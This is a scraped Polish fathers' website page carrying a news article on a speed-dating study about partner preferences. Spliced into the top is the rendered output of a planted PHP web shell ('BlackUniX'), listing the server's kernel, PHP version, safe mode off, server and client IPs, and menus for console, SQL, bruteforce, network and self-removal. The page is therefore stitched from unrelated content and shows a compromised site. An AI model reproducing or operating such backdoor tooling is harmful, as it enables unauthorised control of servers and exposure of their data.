W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:12:54
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Czy kobiety lecą na pieniądze?
10.08.2008.
Niemieccy i amerykańscy naukowcy zbadali czym kierują się kobiety i mężczyźni przy wyborze partnera. Okazało się, że prawa atrakcyjności są niezmienne od czasów neandertalczyka. Mężczyźni dalej poszukują najbardziej atrakcyjnych kobiet, a kobiety poszukują najskuteczniejszych dostarczycieli dóbr .
Zaobserwowali to badacze badająć współczesnych singli w akcji podczas sesji randkowania zorganizowanej w Monachium. W wypełnionych wcześniej kwestionariuszach uczestnicy twierdzili, że szukają swoich lustrzanych odbić - kogoś kto odpowiada ich statusowi, zaangażowaniu i wyglądowi. Ale gdy 21 kobiet i 25 mężczyzn zostało "spikniętych" z przedstawicielami przeciwnej płci i miało zdecydować z kim najbardziej chciałoby się umówić na randkę, udało się zaobserwować preferencje zupełnie inne, niż wcześniej zadeklarowane.

- Istnieje znaczna rozbieżność między tym, co ludzie mówią, a co wybierają - mówi Peter Todd z Indiana University, który opracowywał wyniki badań. Mężczyźni wybierają najbardziej atrakcyjne panie, a kobiety patrzą na zawartość portfela. Kobiety częściej też kalkulują przy wyborze potencjalnych partnerów. Mężczyźni byli skłonni spotkać się jeszcze raz z co drugą kobietą. Kobiety powiedziały to samo tylko o co trzecim mężczyźnie. Myślały też bardziej realistycznie i brały pod uwagę to, co same mogą zaoferować, ale też czy ta osoba odwzajemni ich zainteresowanie. - Kobiety oceniały swoje szanse, a mężczyźni byli skrajnymi optymistami - mówi Todd.

Rezultaty pokazują, że dzisiejsi single, tak jak poprzednie generacje, kierują się wyznacznikiem biologicznym: mężczyźni poszukują partnerek do prokreacji, a kobiety szukają partnerów długoterminowych do wychowywania dzieci. - Ludzie, którzy wybierają kandydatów na partnera w ten sposób, mają ewolucyjną przewagę w większej liczbie potomków - komentuje Todd. Ci, którzy postępują inaczej, z punktu widzenia ewolucji są zbędni, ale ze swojej strategii mogą czerpać inne korzyści...

Źródło informacji: INTERIA.PL
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.